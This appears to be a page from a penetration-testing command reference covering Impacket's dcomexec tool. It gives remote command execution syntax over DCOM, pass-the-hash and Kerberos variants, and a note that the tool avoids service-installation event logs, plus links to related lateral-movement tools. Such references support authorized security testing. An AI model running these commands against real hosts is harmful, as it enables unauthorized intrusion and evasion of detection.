Impacket dcomexec.py
Execute commands over DCOM (MMC20.Application / ShellWindows / ShellBrowserWindow) without dropping a service. Quieter than psexec/smbexec, no service installation event ID 7045.
- Tool
- impacket-dcomexec
- Category
- Lateral Movement / Remote Shells
- Platform
- linux
- Requires
- password
- Protocols
- RPC, SMB
Syntax
Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.
impacket-dcomexec '<domain>/<user>:<password>@<target>'
Credential variants
The same attack using a different authentication material.
Pass-the-Hash requires NTLM hash
impacket-dcomexec -hashes :<nt-hash> '<domain>/<user>@<target>'
ShellWindows Object requires password
impacket-dcomexec -object ShellWindows '<domain>/<user>:<password>@<target>'
Kerberos requires Kerberos ticket
impacket-dcomexec -k -no-pass '<domain>/<user>@<target>'
Examples
impacket-dcomexec corp.local/jdoe:'Password123!'@10.10.10.10
Tags
References
Related commands
- Evil-WinRM Shell Windows Remote Management shell connection
- Impacket AtExec Execute commands via Windows Task Scheduler service
- Impacket atexec.py (Scheduled Task) One-shot command execution by creating, running, and deleting a scheduled task over…
- Impacket DCOMExec Execute commands via DCOM (Distributed Component Object Model)
- Impacket PSExec Execute commands via PSExec service
- Impacket SMBExec Execute commands via SMB service creation
- Impacket WMIExec Execute commands via WMI (Windows Management Instrumentation)
- NetExec SMB Command Exec Execute commands on a remote Windows host via SMB using NetExec